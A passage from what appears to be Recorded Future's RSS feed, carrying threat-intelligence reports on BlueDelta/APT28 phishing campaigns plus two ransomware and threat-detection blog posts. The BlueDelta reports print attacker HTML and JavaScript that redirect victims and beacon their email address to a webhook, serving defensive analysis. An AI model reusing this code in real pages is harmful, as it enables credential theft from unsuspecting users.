          <li>BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.</li>
          <li>Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.</p>
        <h3>Microsoft OWA Credential Harvesting</h3>
        <p>On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in <strong>Figure 1</strong>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dd2f28cbdc733be6383fcbe909dac08761bf2bb0.png?width=750&amp;format=png&amp;optimize=medium" width="1372" height="809" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> OWA login-themed credential-harvesting page (Source: Recorded Future)</div>
          </div>
        </div>
        <p>BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL <em>hxxps://shorturl[.]at/Be4Xe</em>. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL <em>hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7</em>. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.</p>
        <p>The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per <strong>Figure 2</strong>.</p>
        <div>
          <div>
            <div>
              <pre><code>&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
        &lt;meta name="viewport" content="width=device-width"&gt;
        &lt;meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"&gt;&lt;/object&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 2:</strong></em> <em>HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)</em></p>
        <p>The PDF lure document, shown in <strong>Figure 3</strong>, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a7e9f590d762d7e489a243d9e12bcccb33d79463.png?width=750&amp;format=png&amp;optimize=medium" width="864" height="913" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL <em>hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4</em>, which hosts a spoofed OWA login page as shown in <strong>Figure 1</strong>. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.<br /><br />As shown in <strong>Figure 4</strong>, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in <strong>Figure 5,</strong> and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.</p>
        <div>
          <div>
            <div><code>&lt;input type="hidden" id="href" name="href" role="textbox" aria-labelledby="userNameLabel" value="hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;&lt;/div&gt;</code></div>
          </div>
        </div>
        <p><em><strong>Figure 4:</strong></em> <em>Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <pre><code>&lt;script&gt;
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
&lt;/script&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future</em>)</p>
        <p>The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “<code>u=</code>” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to <code>/owa/</code> to imitate a legitimate OWA login page.<br /><br />When the HTML form is submitted, a JavaScript function named <code>myFunction</code> captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in <strong>Figure 6</strong>.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_13adafe204e74a6a3976247e1c12b0466f536b86e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[New ransomware tactics to watch out for in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/ransomware-tactics-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ransomware-tactics-2026</guid>
            <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Ransomware groups made less money in 2025 despite a 47% increase in attacks, driving new tactics: bundled DDoS services, insider recruitment, and gig worker exploitation. Learn the emerging trends defenders must prepare for in 2026.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.</li>
          <li>Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.</li>
          <li>Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.</li>
        </ul>
        <h2>The ransomware paradox: More attacks, less money</h2>
        <p>By most accounts, ransomware groups <a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet"></a><a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet">made less money</a> in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to <a href="https://www.recordedfuture.com/products/threat-intelligence"></a><a href="https://www.recordedfuture.com/products/threat-intelligence">Recorded Future Intelligence</a>, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.</p>
        <p>For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.</p>
        <p>This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.</p>
        <h2>Trend 1: DDoS services return to the RaaS model</h2>
        <p>With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.</p>
        <p>The newly formed <a href="https://blog.talosintelligence.com/new-chaos-ransomware/"></a><a href="https://blog.talosintelligence.com/new-chaos-ransomware/">Chaos ransomware group</a> (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.</li>
        </ul>
        <h2>Trend 2: Insider recruitment attempts are accelerating</h2>
        <p>Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.</p>
        <p>The most public example came earlier this year when a ransomware group attempted to recruit a <a href="https://www.bbc.com/news/articles/c3w5n903447o"></a><a href="https://www.bbc.com/news/articles/c3w5n903447o">reporter at the BBC</a>. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.</li>
        </ul>
        <h2>Trend 3: Gig workers as unwitting attack vectors</h2>
        <p>According to a recent <a href="https://www.ic3.gov/CSA/2025/250523.pdf">FBI advisory</a>, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.</p>
        <p>The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.</li>
        </ul>
        <h2>Looking ahead: One big prediction for 2026</h2>
        <p>The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.</p>
        <p>Recorded Future believes that 2026 will be the first year the number of <em>new</em> ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.</p>
        <h2>The bottom line: Strengthen your ransomware defenses</h2>
        <p>Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:</p>
        <ul>
          <li><strong>Explore Recorded Future's</strong> <strong><a href="https://www.recordedfuture.com/use-case/ransomware"></a><a href="https://www.recordedfuture.com/use-case/ransomware">Ransomware Mitigation Solution</a></strong> for end-to-end visibility into your ransomware exposure across the attack lifecycle.</li>
          <li><strong>Read our latest</strong> <strong><a href="https://www.recordedfuture.com/research/insikt-group"></a><a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group® research</a></strong> on ransomware trends, threat actor TTPs, and emerging attack vectors.</li>
          <li><strong>Download the</strong> <strong><a href="https://www.recordedfuture.com/resources/guides/proactive-ransomware-mitigation"></a><a href="https://www.recordedfuture.com/resources/guides/proactive-ransomware-mitigation">Proactive Ransomware Mitigation eBook</a></strong> for actionable strategies to identify, investigate, and prioritize cyber threats.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_13d33e30a4d6ff2bf805413e36ff4532517bc417e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Threat Detection Tools & Best Practices]]></title>
            <link>https://www.recordedfuture.com/blog/digital-threat-detection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-threat-detection</guid>
            <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore digital threat detection tools and learn best practices to identify, analyze, and neutralize digital threats before they impact your business.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Digital threats now originate far beyond the perimeter.</strong> Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.</li>
          <li><strong>Context is the foundation of effective detection.</strong> Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.</li>
          <li><strong>Modern digital threat detection (DTD) requires visibility across the external digital environment.</strong> The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.</li>
          <li><strong>Analysts need automation to keep pace.</strong> High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.</li>
          <li><strong>Recorded Future operationalizes intelligence at enterprise scale.</strong> The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.</li>
        </ul>
        <h2>Why Digital Threat Detection Requires a New Approach</h2>
        <p>Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:</p>
        <ul>
          <li>High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.</li>
          <li>Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.</li>
          <li>Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.</li>
          <li>Alert fatigue from manually sifting through noise to find high-risk signals.</li>
        </ul>
        <p>As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.</p>
        <p>Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.</p>
        <p>The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.</p>
        <h2>Understanding the Modern Digital Threat Landscape</h2>
        <p>To <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">build an effective digital threat detection program</a>, security teams must understand where modern threats originate and how attackers operate.</p>
        <h3>Key Threat Vectors Beyond the Perimeter</h3>
        <h4>Leaked credentials and account takeover attempts (stolen identities)</h4>
        <p>Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.</p>
        <h4>Brand impersonation, domain spoofing, and phishing campaigns</h4>
        <p>Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.</p>
        <h4>Vulnerability exploitation and zero-day threats in the external attack surface</h4>
        <p>Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.</p>
        <h4>Dark web chatter and early warning signs of planned ransomware or DDoS attacks</h4>
        <p>Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.</p>
        <h2>Why an Intelligence-Driven Approach is Better</h2>
        <p>For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.</p>
        <p>Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the <a href="https://www.recordedfuture.com/blog/digital-risk-management-strategies">broader digital ecosystem</a>. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.</p>
        <p>The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.</p>
        <h2>Essential Digital Threat Detection Tools and Technologies</h2>
        <p>Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.</p>
        <h3>Threat Intelligence Platforms: The Engines of Context</h3>
        <p>No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.</p>
        <p>Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:</p>
        <ul>
          <li>Open web reporting</li>
          <li>Underground forums</li>
          <li>Dark web marketplaces</li>
          <li>Malware sandboxes</li>
          <li>Threat feeds</li>
          <li>Researcher data</li>
        </ul>
        <p>Once the data is normalized, the platform enriches it with context, such as:</p>
        <ul>
          <li>Relationships between indicators</li>
          <li>Associations with known threat actors</li>
          <li>Infrastructure reuse</li>
          <li>Activity targeting specific industries or regions</li>
        </ul>
        <p>This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.</p>
        <h3>Security Orchestration, Automation, and Response (SOAR)</h3>
        <p>While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.</p>
        <p>Key SOAR capabilities include:</p>
        <ul>
          <li><strong>Enriching alerts</strong> with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)</li>
          <li><strong>Blocking malicious indicators</strong> across firewalls, endpoints, cloud environments, and identity systems</li>
          <li><strong>Initiating takedown workflows</strong> for harmful domains or impersonation infrastructure</li>
          <li><strong>Coordinating actions</strong> across multiple security tools to ensure a unified response</li>
          <li><strong>Documenting each step</strong> of the investigation for reporting and compliance</li>
        </ul>
        <p>By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.</p>
        <h3>Endpoint Detection and Response (EDR) &amp; Security Information and Event Management (SIEM) Integration</h3>
        <p>EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.</p>
        <p>EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.</p>
        <p>Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.</p>
        <p>Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.</p>
        <h2>Overcoming the Analyst’s Biggest Pain Points</h2>
        <p>Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.</p>
        <h3>The Drain of Alert Fatigue and False Positives</h3>
        <p>High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.</p>
        <p>The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.</p>
        <h3>The Blind Spots of External Risk</h3>
        <p>Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.</p>
        <p>These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.</p>
        <h2>Recorded Future: Operationalizing Digital Threat Intelligence at Scale</h2>
        <p>Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.</p>
        <h3>Real-Time Context from the Intelligence GraphⓇ</h3>
        <p><a href="https://www.recordedfuture.com/platform/intelligence-graph">The Intelligence GraphⓇ</a> addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:</p>
        <ul>
          <li>Open web</li>
          <li>Dark web marketplaces</li>
          <li>Malware repositories</li>
          <li>Technical feeds</li>
          <li>Network telemetry</li>
          <li>Closed underground forums</li>
        </ul>
        <p>No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.</p>
        <h3>Comprehensive Digital Risk Protection for External Threats</h3>
        <p>Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.</p>
        <p>Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.</p>
        <h3>Accelerating Time-to-Action through Integrated Intelligence</h3>
        <p>Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.</p>
        <p>An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.</p>
        <p>Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.</p>
        <p>This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&amp;CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.</p>
        <h3>Smarter, Faster Security Decisions</h3>
        <p>Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.</p>
        <p>By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.</p>
        <p>These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.</p>
        <p>Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how <a href="https://www.recordedfuture.com/use-case/digital-risk">Recorded Future</a> can support your Digital Threat Detection strategy.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14639da492947ba40cd78b2b341750064fc2e01ca.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[BlueDelta’s Persistent Campaign Against UKR.NET]]></title>
            <link>https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Russia’s BlueDelta targets UKR.NET users with advanced credential-harvesting campaigns, evolving tradecraft, and multi-stage phishing techniques.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was July 30, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “<a href="https://www.recordedfuture.com/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns</a>,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.</p>
        <p>Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.</p>
        <p>BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.</li>
          <li>The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.</li>
          <li>BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.</li>
          <li>Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.</li>
          <li>The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in <strong>Figure 1</strong>. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1aedf1a1ebaf322a2b9cea5d91b9c34059f89d679.png?width=750&amp;format=png&amp;optimize=medium" width="1575" height="1189" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)</em></p>
        <p>The malicious UKR.NET page had very similar functionality to that previously <a href="https://www.recordedfuture.com/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">observed</a> by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, <em>kfghjerrlknsm[.]line[.]pm[:]11962</em>, as per <strong>Figure 2</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11071d6fe28c7569a9a99c22d79c151693b79be2a.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1312" height="1600" />
        </p>
        <p><em><strong>Figure 2:</strong></em> <em>UKR.NET credential capture page JavaScript (Source: Recorded Future)</em></p>
        <p>The <em>line[.]pm</em> apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.</p>
        <p>At the time of analysis, the domain resolved to the IP address <em>18[.]157[.]68[.]73</em>, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.</p>
